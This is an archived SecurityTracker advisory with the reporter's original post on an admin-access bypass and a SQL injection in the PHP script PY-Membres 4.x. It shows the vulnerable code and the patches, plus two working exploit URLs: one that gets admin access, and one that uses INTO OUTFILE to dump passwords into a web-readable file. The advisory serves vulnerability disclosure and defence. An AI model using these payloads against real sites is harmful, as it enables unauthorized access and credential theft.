SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Join our Affiliate Program
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Sign Up!





Category:  Application (Forum/Board/Portal)  >  PY-Membres Vendors:  Legendre, Pierre-Yves
PY-Membres Input Validation Flaw in 'pass_done.php' Permits SQL Injection
SecurityTracker Alert ID:  1007581
CVE Reference:  GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Aug 26 2003
Impact:  Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 4.0, 4.1, 4.2
Description:  An input validation vulnerability was reported in PY-Membres in the 'pass_done.php' script. A remote user can execute SQL commands and obtain user passwords. A remote user can also gain administrative access.

Frog-m@n reported that a remote user can set the 'adminpy' variable when calling the 'admin/secure.php' script to be successfully authenticated as an administrator. A demonstration exploit URL is provided:

http://[target]/admin/admin.php?adminpy=1

Also, an input validation vulnerability in the 'pass_done.php' script lets a remote user inject SQL commands to be executed by the underlying SQL database. This flaw can be exploited if magic_quotes_gpc is set to 'OFF' in the 'php.ini' configuration file. A remote user can submit a specially crafted query to retrieve the password for any specified user on the application. A demonstration exploit URL is provided:

http://[target]/pass_done.php?Submit=1&email='%20OR%203%20IN%20(1,2,3)%20INTO%20OUTFILE%20'/complete/path/file.txt

The above listed exploit URL will cause passwords to be written to the 'file.txt' file in a web-accessible directory (from which the remote user can then retrieve the file).
Impact:  A remote user can gain administrative access to the application.

A remote user can execute SQL queries on the system. Using this method, a remote user can view the passwords for any user on the application.
Solution:  No solution was available at the time of this entry.

An unofficial patch is available at:

http://www.phpsecure.info/
Vendor URL:  www.scripts-php.com/index.php?page=script&pyid=3 (Links to External Site)
Cause:  Access control error, Authentication error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Reported By:  "Frog Man" <leseulfrog@hotmail.com>
Message History:   None.

 Source Message Contents
Date:  Tue, 26 Aug 2003 17:03:33 +0200
From:  "Frog Man" <leseulfrog@hotmail.com>
Subject:  [VulnWatch] [PHP] PY-Membres 4.2 : Admin Access, SQL Injection

 

Informations :
°°°°°°°°°°°°°
Language : PHP
Version : 4.0, 4.1, 4.2 (and less ?)
Website : http://www.scripts-php.com
Problems :
- Admin Access
- SQL Injection

PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
admin/secure.php :

----------------------------------------------
<?
if (!isset($adminpy) && $adminpy !== "$admin")
 
Header("Location: index.php");
exit;
 
?>
----------------------------------------------

pass_done.php :

-----------------------------------------------------------------------------------------------------
------------------------
[...]
if($Submit)
 
connexiondb();
$query = mysql_query("SELECT login, passwd FROM $db_table WHERE 
email='$email'");
list($login, $passwd) = mysql_fetch_row($query);
$nb=mysql_num_rows($query);
if($nb<1)
{ echo"<script language=\"Javascript\">alert('Aucun membre ne correspond à 
votre e-mail !');window.location='pass_done.php';</script>";
exit;}
[...]
-----------------------------------------------------------------------------------------------------
------------------------


Exploits :
°°°°°°°°

http://[target]/admin/admin.php?adminpy=1

http://[target]/pass_done.php?Submit=1&email='%20OR%203%20IN%20(1,2,3)%20INTO%20OUTFILE%20'/compl
ete/path/file.txt


Patch :
°°°°°°°
A patch and more details can be found on http://www.phpsecure.info.

In admin/secure.php, just replace the line :
----------------------------------------------
if (!isset($adminpy) && $adminpy !== "$admin")
----------------------------------------------
by :
----------------------------------------------
if (!isset($adminpy) || $adminpy !== "$admin")
----------------------------------------------


And in pass_done.php, add the line :
----------------------------
$email = addslashes($email);
----------------------------

just before :

---------------------------------------------------------------------------------
$query = mysql_query("SELECT login, passwd FROM $db_table WHERE 
email='$email'");
---------------------------------------------------------------------------------





frog-m@n

_________________________________________________________________
Recevez vos e-mails MSN Hotmail par SMS sur votre GSM ! 
http://www.fr.msn.be/gsm/servicesms/hotmailparsms


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2002, SecurityGlobal.net LLC